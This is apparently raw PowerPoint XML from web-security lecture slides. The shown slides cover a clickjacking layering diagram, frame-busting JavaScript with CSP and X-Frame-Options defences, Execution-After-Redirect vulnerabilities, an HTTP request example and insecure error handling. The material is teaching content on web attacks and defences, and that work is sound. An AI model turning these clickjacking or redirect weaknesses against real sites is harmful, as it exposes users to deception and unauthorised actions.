            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    &lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> &lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291280751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Clickjacking Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1278683" y="1594080"/>
            <a:ext cx="3697775" cy="2365200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00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Tahoma" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="sc.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="39000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3993375" y="2014516"/>
            <a:ext cx="3566340" cy="2338424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Bevel 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514153" y="2527200"/>
            <a:ext cx="1365066" cy="408240"/>
          </a:xfrm>
          <a:prstGeom prst="bevel">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Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Press Here!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7611553" y="2818800"/>
            <a:ext cx="1006180" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Z-level: 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Transparent</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428881" y="1611180"/>
            <a:ext cx="777752" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Z-level: 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Opaque</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1261403" y="1594080"/>
            <a:ext cx="2730132" cy="4212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14" name="Straight Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4973343" y="1598220"/>
            <a:ext cx="2586372" cy="4041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16" name="Straight Connector 15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1266929" y="3963420"/>
            <a:ext cx="2724606" cy="39762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18" name="Straight Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4970229" y="3954600"/>
            <a:ext cx="2586372" cy="4041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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="323882682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Frame-Busting Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;style&gt; body { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>display:none</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;} &lt;/style&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  if (self == top) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    document.getElementsByTagName(”body”)[0].style.display = ’block’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  else { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>top.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>self.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  }  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>From: Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites, July 2010</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Also: Content-Security-Policy: frame-ancestors 'none’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Also: X-Frame-Options: deny</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77876381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Fear the EAR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execution-After-Redirect vulnerabilities are introduced when code is executed after producing a redirect header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The developer assumes that since a redirection occurred, code execution stopped</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Redirect used as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Normally the behavior is invisible to the user, because the browser automatically load the page referenced by the redirection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3156246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GB"/>
              <a:t>Request Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="826371" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>GET /doc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>activities.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Host: longboard:8080</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Date: Tue, 03 Nov 2017 8:34:12 GMT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Pragma: no-cache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>www.ms.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>main.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>If-Modified-Since: Sat, 15 Oct 2017 19:00:15 GMT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;CR LF&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3967282514"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="me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DC99-5FF3-26B9-B65F-3FD232A83835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insecure Error Handling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32798C70-164E-A6F9-D76F-20122640BBD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Handling errors well is critical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exceptions can contain sensitive information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Errors can be used in blind injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sometimes errors can lead to subtle (erroneous) behavior</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="276048552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Redirects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2035021" y="2288572"/>
            <a:ext cx="4891922" cy="54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265435" y="1560739"/>
            <a:ext cx="4392994" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>GET /user/info HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Arrow Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2035021" y="3236633"/>
            <a:ext cx="4891922" cy="54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265435" y="2503105"/>
            <a:ext cx="6268966" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>HTTP/1.1 302 Moved</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Location: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Straight Arrow Connector 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2035021" y="4286250"/>
            <a:ext cx="4891922" cy="54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2265435" y="3494653"/>
            <a:ext cx="4392994" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>GET /login HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="serv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1059" y="1744333"/>
            <a:ext cx="1019782" cy="1236272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="296251" y="1819660"/>
            <a:ext cx="1577823" cy="1021935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56737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7" grpId="0"/>
      <p:bldP spid="29" grpId="0"/>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Execution After Redirect: Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1218812"/>
            <a:ext cx="8229600" cy="3753890"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>TopicsController</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ApplicationController</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
